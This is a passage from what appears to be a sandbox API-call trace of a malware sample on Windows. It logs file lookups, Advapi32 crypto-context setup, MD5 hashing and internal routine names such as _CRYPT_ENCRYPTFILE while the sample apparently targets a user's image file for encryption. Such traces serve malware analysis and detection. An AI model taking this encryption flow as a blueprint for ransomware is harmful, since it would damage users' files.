lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0191.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.457] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0191.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0191.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0191.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0191.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0191.457] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0191.457] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0191.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.457] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0191.457] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0191.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.457] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.457] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x8f3abf20, ftLastWriteTime.dwHighDateTime=0x1d5e431, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 0x90add8 [0191.458] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x8f3abf20, ftLastWriteTime.dwHighDateTime=0x1d5e431, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 0x90add8 [0191.458] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0191.458] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.458] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.459] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ictures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ctures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ures\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="res\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="es\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OV_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_bHLK.gif\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0191.460] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0191.460] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0191.460] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0191.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0191.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0191.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.460] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.461] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0191.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.461] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\OV_bHLK.gif", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17de1ac0, ftCreationTime.dwHighDateTime=0x1d5da23, ftLastAccessTime.dwLowDateTime=0x8f3abf20, ftLastAccessTime.dwHighDateTime=0x1d5e431, ftLastWriteTime.dwLowDateTime=0x8f3abf20, ftLastWriteTime.dwHighDateTime=0x1d5e431, nFileSizeHigh=0x0, nFileSizeLow=0x1270a, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="OV_bHLK.gif", cAlternateFileName="")) returned 0x90af58 [0191.461] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0191.461] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.461] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.461] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.461] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0191.461] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.461] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0191.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0191.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.462] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.462] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.462] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.462] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0191.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.462] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0191.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.463] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.463] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0191.463] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.463] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.464] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.464] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0191.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.464] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.464] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.464] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.464] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.465] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.465] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.465] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.465] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.465] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.465] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.465] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.465] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.465] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.465] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.465] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.466] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.466] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, 